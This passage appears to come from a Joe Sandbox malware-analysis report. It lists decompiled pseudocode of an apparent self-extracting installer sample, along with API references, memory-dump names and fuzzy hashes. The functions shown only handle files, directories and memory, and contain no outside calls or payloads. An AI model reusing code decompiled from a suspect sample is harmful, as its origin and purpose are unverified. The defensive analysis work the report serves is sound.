                                                                                                                                                                                                                                                0x010e4dbd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4dc3
                                                                                                                                                                                                                                                0x010e4dc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4dc5
                                                                                                                                                                                                                                                0x010e4dbd
                                                                                                                                                                                                                                                0x010e4d2a
                                                                                                                                                                                                                                                0x010e4d2a
                                                                                                                                                                                                                                                0x010e4d2d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d2d
                                                                                                                                                                                                                                                0x010e4cf8
                                                                                                                                                                                                                                                0x010e4cfd
                                                                                                                                                                                                                                                0x010e4d02
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010E4DB5
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010E4DDD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                                • API String ID: 3625706803-256195474
                                                                                                                                                                                                                                                • Opcode ID: 627659d0b0b86bd9f157fede7aae2e531afe7e86a7626ec474f1ee576a40bcdc
                                                                                                                                                                                                                                                • Instruction ID: 6a74f7a0d8011e3e3be5f296a84a21226e159b22aa6c832b8d7258e85f33f5a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 627659d0b0b86bd9f157fede7aae2e531afe7e86a7626ec474f1ee576a40bcdc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B14126366081068FDB75AE3ED94C6F977E6EB45700F0486E8D8C2D7285DA33DA46C790
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                                				struct _FILETIME _v20;
                                                                                                                                                                                                                                                				FILETIME* _t14;
                                                                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t21 + 0x10e8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t14 =  &_v12;
                                                                                                                                                                                                                                                					_t15 = SetFileTime( *(_t21 + 0x10e8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010E4C54
                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010E4C66
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 010E4C7E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2071732420-0
                                                                                                                                                                                                                                                • Opcode ID: a13b8d3601c31b827841d2792b1936887b38dd653b5e53a35ab0e444621f1db7
                                                                                                                                                                                                                                                • Instruction ID: 1738ac42376a1007c5b88f23f4ac824ec6114280dfd98740227646bfae8525a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a13b8d3601c31b827841d2792b1936887b38dd653b5e53a35ab0e444621f1db7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DF0967260020DBFABA9DFAACC4CDFB7BEDEB0C644744456BA695C3000E635E524C760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E010E487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                				CHAR* _t11;
                                                                                                                                                                                                                                                				long _t18;
                                                                                                                                                                                                                                                				long _t23;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t11 = __ecx;
                                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                                				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                                				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                                					asm("sbb esi, esi");
                                                                                                                                                                                                                                                					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                                						asm("sbb esi, esi");
                                                                                                                                                                                                                                                						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t23 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                                				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                                					return _t7;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E010E490C(_t11);
                                                                                                                                                                                                                                                					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010E4A23,?,010E4F67,*MEMCAB,00008000,00000180), ref: 010E48DE
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010E4F67,*MEMCAB,00008000,00000180), ref: 010E4902
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: 8e4e6b6b29f3d006b7d8d7d6208a463827b16478dcbd8406ed0794f20a89c48a
                                                                                                                                                                                                                                                • Instruction ID: 69ab8053d9bca5e0fe377f073cbc630bc70c3822a907f30e8c5a8e4f8130daae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e4e6b6b29f3d006b7d8d7d6208a463827b16478dcbd8406ed0794f20a89c48a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D0162A3E115702AF364402A4C8CFFB559CCBD6634F1B0375BEEAE71C1D5585C0481E0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				int _t12;
                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				struct HWND__* _t21;
                                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 =  *0x10e858c; // 0x26c
                                                                                                                                                                                                                                                				_t9 = E010E3680(_t20);
                                                                                                                                                                                                                                                				if( *0x10e91d8 == 0) {
                                                                                                                                                                                                                                                					_push(_t24);
                                                                                                                                                                                                                                                					_t12 = WriteFile( *(0x10e8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						_t25 = _a12;
                                                                                                                                                                                                                                                						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                							_t14 =  *0x10e9400; // 0x2e800
                                                                                                                                                                                                                                                							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                                							 *0x10e9400 = _t15;
                                                                                                                                                                                                                                                							if( *0x10e8184 != 0) {
                                                                                                                                                                                                                                                								_t21 =  *0x10e8584; // 0x0
                                                                                                                                                                                                                                                								if(_t21 != 0) {
                                                                                                                                                                                                                                                									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10e93f8, 0);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return _t25;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010E369F
                                                                                                                                                                                                                                                  • Part of subcall function 010E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36B2
                                                                                                                                                                                                                                                  • Part of subcall function 010E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36DA
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010E4B05
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                • Opcode ID: 79a28840dc2ce808149423372b8007b23f28f8ee7b4cfcb18b71ae5eff2f787e
                                                                                                                                                                                                                                                • Instruction ID: 679576c095e4b5bba4113c302947220015081da83ade526100ecf983f585c37a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79a28840dc2ce808149423372b8007b23f28f8ee7b4cfcb18b71ae5eff2f787e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E00184712002019FDB658F6BDC09BA67BD9B744B25F048265FAB9DF1D4CB7A9811CB40
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                                				char* _t6;
                                                                                                                                                                                                                                                				char* _t8;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				char* _t16;
                                                                                                                                                                                                                                                				intOrPtr* _t17;
                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                				char* _t19;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t16 = __ecx;
                                                                                                                                                                                                                                                				_t10 = __edx;
                                                                                                                                                                                                                                                				_t17 = __ecx;
                                                                                                                                                                                                                                                				_t1 = _t17 + 1; // 0x10e8b3f
                                                                                                                                                                                                                                                				_t12 = _t1;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t4 =  *_t17;
                                                                                                                                                                                                                                                					_t17 = _t17 + 1;
                                                                                                                                                                                                                                                				} while (_t4 != 0);
                                                                                                                                                                                                                                                				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                                				_t2 = _t18 + 1; // 0x10e8b40
                                                                                                                                                                                                                                                				if(_t2 < __edx) {
                                                                                                                                                                                                                                                					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                                					if(_t19 > __ecx) {
                                                                                                                                                                                                                                                						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                                						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                                							 *_t19 = 0x5c;
                                                                                                                                                                                                                                                							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t6 = _a4;
                                                                                                                                                                                                                                                					 *_t19 = 0;
                                                                                                                                                                                                                                                					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                                						_t6 = _t6 + 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return E010E16B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0x8007007a;
                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(010E8B3E,010E8B3F,00000001,010E8B3E,-00000003,?,010E60EC,010E1140,?), ref: 010E65BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                • Opcode ID: 311b62462931f9e2efcb58878922fbd33ee24d1c85f4e3b37bd1ffe1c759c1e3
                                                                                                                                                                                                                                                • Instruction ID: c0b904de67f717a9ee651895ea08f9bbcb724c232487cede38f1810eddd7d1c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 311b62462931f9e2efcb58878922fbd33ee24d1c85f4e3b37bd1ffe1c759c1e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50F02D333042509FD331051FA88CBA7BFD99BA5150F18059AE9DAC3205CA678C4583A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E621E() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t5 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                					0x4f0 = 2;
                                                                                                                                                                                                                                                					_t9 = E010E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E010E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                                					 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                					_t9 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010E623F
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 381621628-0
                                                                                                                                                                                                                                                • Opcode ID: dcfe451fa124418c4765d3098d065a8058ce17e63e5a48d16372c48ff3e46c03
                                                                                                                                                                                                                                                • Instruction ID: 8530d7e38d47f2aac357c3d35eac177b4d3b8ebdf6aa9413968ed63a4110be84
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcfe451fa124418c4765d3098d065a8058ce17e63e5a48d16372c48ff3e46c03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6F0B4B0700209AFD760EB769D09BFE36E8DBA4700F40046AA9C5DB181DD769D408750
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E4B60(signed int _a4) {
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t15 + 0x10e8d64)) != 1) {
                                                                                                                                                                                                                                                					_t9 = FindCloseChangeNotification( *(_t15 + 0x10e8d74)); // executed
                                                                                                                                                                                                                                                					if(_t9 == 0) {
                                                                                                                                                                                                                                                						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *((intOrPtr*)(_t15 + 0x10e8d60)) = 1;
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x10e8d60)) = 1;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x10e8d68)) = 0;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x10e8d70)) = 0;
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t15 + 0x10e8d6c)) = 0;
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010E4FA1,00000000), ref: 010E4B98
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                • Opcode ID: 30563ae3cbabb56b0ec2f4166e5f805441b7c4649304728076f5cc0b51cdccd1
                                                                                                                                                                                                                                                • Instruction ID: c7ba197bcc2132f7268aa845f62ac84d73f6853271aa91bbbc14ddbf1f7a6f80
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30563ae3cbabb56b0ec2f4166e5f805441b7c4649304728076f5cc0b51cdccd1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DF01231508B09AE4771EE2FCC0469ABBE6AAD52603108A2F96EED2150E7326451EB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E66AE(CHAR* __ecx) {
                                                                                                                                                                                                                                                				unsigned int _t1;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                                				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                                					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,010E4777,?,010E4E38,?), ref: 010E66B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: 06aa061500e28b9829644265fb07ccb9a3a8fbd95dfbe09d9b81d1dfbdd9bd03
                                                                                                                                                                                                                                                • Instruction ID: ffd0b99994ef6290eae1a293619863751dde55230216a18d774198c9ede6c646
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06aa061500e28b9829644265fb07ccb9a3a8fbd95dfbe09d9b81d1dfbdd9bd03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46B09276232440866A611636782955628C1A6C563ABE52B91F072C11D4CA3FD546D504
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E4CA0(long _a4) {
                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                0x010e4caa
                                                                                                                                                                                                                                                0x010e4cb1

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 010E4CAA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                • Opcode ID: 05ee9cdf5216ee9352b41dc3e9404c031c78feae1ec3d7569a71be86cc67eddd
